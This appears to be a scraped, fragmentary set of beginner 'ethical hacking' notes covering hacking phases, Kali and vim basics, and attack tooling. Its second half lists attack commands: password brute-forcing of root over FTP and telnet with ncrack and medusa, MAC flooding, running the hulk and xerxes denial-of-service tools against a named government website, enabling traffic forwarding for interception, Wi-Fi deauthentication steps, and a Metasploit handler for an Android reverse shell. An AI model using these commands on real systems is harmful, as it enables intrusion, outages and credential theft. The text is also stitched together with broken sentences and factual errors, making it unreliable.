Professional Documents
Culture Documents
Ethical Hacking Notes
Ethical Hacking Notes
Ethical Hacking…?
Types of Hacking…?
Website Hacking: - Hacking a website means taking
unauthorized control over a web server and its associated
software such as databases and other interfaces.
`
Ethical Hacking: - Ethical hacking involves finding
weaknesses in a computer or network system for testing
purpose and finally getting them fixed.
Advantages of Hacking…?
To recover lost information, especially in case you
lost your password.
To perform penetration testing to strengthen
computer and network security.
To put adequate preventative measures in place to
prevent security breaches.
To have a computer system that prevents malicious
hackers from gaining access
Disadvantages of Hacking…?
Massive security breach.
Unauthorized system access on private information.
Privacy violation.
Hampering system operation.
`
Denial of service attacks
Malicious attack on the system.
Type of Hackers…?
`
Blue Hat hacker: - A blue hat hacker is someone
outside computer security consulting firms who is used to
bug-test a system prior to its launch. They look for
loopholes that can be exploited and try to close these
gaps. Microsoft also uses the term BlueHat to represent
a series of security briefing events.
`
Hacking Terminologies: -
`
Clone phishing: Clone phishing is the modification of an
existing, legitimate email with a false link to trick the
recipient into providing personal information.
`
Keystroke logging: Keystroke logging is the process of
tracking the keys which are pressed on a computer (and
which touchscreen points are used). It is simply the map
of a computer/human interface. It is used by gray and
black hat hackers to record login IDs and passwords.
Keyloggers are usually secreted onto a device using a
Trojan delivered by a phishing email.
`
Shrink Wrap code: A Shrink Wrap code attack is an
act of exploiting holes in unpatched or poorly configured
software.
`
Threat: A threat is a possible danger that can
exploit an existing bug or vulnerability to compromise the
security of a computer or network system.
`
soldier or 'drone' for malicious activity, for example,
distributing unwanted spam e-mails.
To install package..
To remove package
Or-------------------------------------------------------
#apt-get update
To update packages
#vim /etc/apt/source.list
To install package
`
#update-rc.d
To save the services
Vim editors
Type of editors->
Vi editor
Vim editor
Nano editor
Emacs editor
Leafpad editor
Three modes in vim editors that can use to access the file
modify
-command mode
-insert mode
-user exec mode
`
- To switch from user exec mode to insert mode to
insert mode press esc then i
Commands for command mode:-
- Press “yy” to copy a line in vim editors
- Press “yw” to copy a word in vim editors
- Press “dd” to cut a line
- Press “dw” to cut s word
- Press “p” to paste line/word in vim editor
- Press “shift+g” to reach starting file
- Press “G” to end of the line
#man vim
Phases of hacking..
1. Reconnaissance
2. Scanning
3. Gaining Access
`
4. Maintaining Access
5. Covering Tracks
1 Reconnaissance
This is the process of gathering information about
victim through various methods by
hacker/attacker.
There are two type of reconnaissance, i.e.-
Active Reconnaissance
Passive Reconnaissance:
Dumpster Driving,
Whois Protocol ,
Social engineering,
Internet searches,
Enumeration
2 Scanning
Attacker sets target and finds out security loops and
alternatives to get to target.
Methods used for Scanning–
Monitoring [wireshark – passive sniffing]
Network scanning [Nmap, Ettercap]
Vulnerability Assessment.
3 Gaining Access
Attacker attacks on target’s/ victim’s system and try to
access resources from target system.
`
Methods used for Gaining Access –
MITM [Man In The Middle].
Penetration Testing [Metasploit, SQL Injection, Phising,
etc].
Malicious Activities [Viruses, Worms, Spywares, Adware,
etc].
4 Maintaining Access
Having gained access, an attacker must maintain access
long enough to accomplish his or her objectives.
Methods used for Maintaining Access -
Trojan Horses [Backdoors]
5 Covering Tracks
After achieving his or her objectives, the attacker
typically takes steps to hide the intrusion and possible
controls left behind for future visits. Methods for Covering
Tracks / Clearing logs Anonymity [Anonymous proxy –
Tor browser].
Information gathering-
#whois google.com
To get information about any domain
`
#ip2location
To check the location of the domain and ip
#ping google.com
(copy ip from here and run with ip2location)
#www.archive.org
Through this you can get the details about the website if
there are any changes.
#dns enumeration
Dns free for all so we can get more info from dns server
Both the tools can give you the info about the target
domain
Scanning-
`
it can work equally well for single hosts. Network administrators
also find it useful for tasks
such as network inventory, managing service upgrade schedules,
and monitoring host or
service uptime.
Nmap uses raw IP packets to determine:
`
To scan host firewall
#nmap –sA 192.168.1.1
`
medusa
ncrack
1) Hydra-
For ftp
#ncrack -u root -P passwd.txt <destination ip> -p 21
For telnet
#ncrack -u root -P passwd.txt <destination ip> -p 23
Medusa----------
`
#medusa -u anonymous -P passwd.txt -h <destination ip> -p 23
#macof -i eth0
#download hulk.zip
#unzip hulk.zip
#chmod +x hulk
#python hulk.py <website url>
`
#chmod +x xerxes
#./xerxes <address of the website>
Ex. #./xerxes www.rgpv.nic
#arp -a
To check the arp table
`
To perform these steps first forward port in kali linux
#echo 1 > /proc/sys/net/ipv4/ip_forward
These command will redirect the target traffic through the attacker’s
system
Now you can check the capture data with the help of wireshark
#wireshark -G
To start wireshark graphically
Set the filter
Ip.addr == <target ip>
WireLess security
---------------------------------------------------------------------------------------
--------------------------------
#ifconfig wlan0 down
#ifconfig wlan0 up
`
#airodump-ng wlan0
#iwconfig
To check the set interface info
++++++++++++++++++++++++++++
#airomon-ng check kill
To stop the process
+++++++++++++++++++++++++++
Deauth Attack
Set the channel and monitor mode on wlan0
`
To stop the connectivity
Metasploit Terminologies
Exploit- an exploit is mean to which the attacker or pen tester
takes the advantages of a flaw within a system application or any
service .an attacker use an exploit in such way that particular
desired outcome that developer never intend.
`
help of shell code .normally shell code write in assembly
language.
Meterpreter>help
To get the command help
`
#msfconsole
Msf>use exploit/multi/handler
-show options
-set PAYLOAD android/meterpreter/reverse_tcp
-set LHOST <own ip>
-set LPORT 4444
-exploit –z –j
-sessions -i
Meterpreter>help
To get the command help
#msfvenom --help
To check all switches, this is used along with payload.
#msfvenom --list
To list the payloads that can be created by metasploit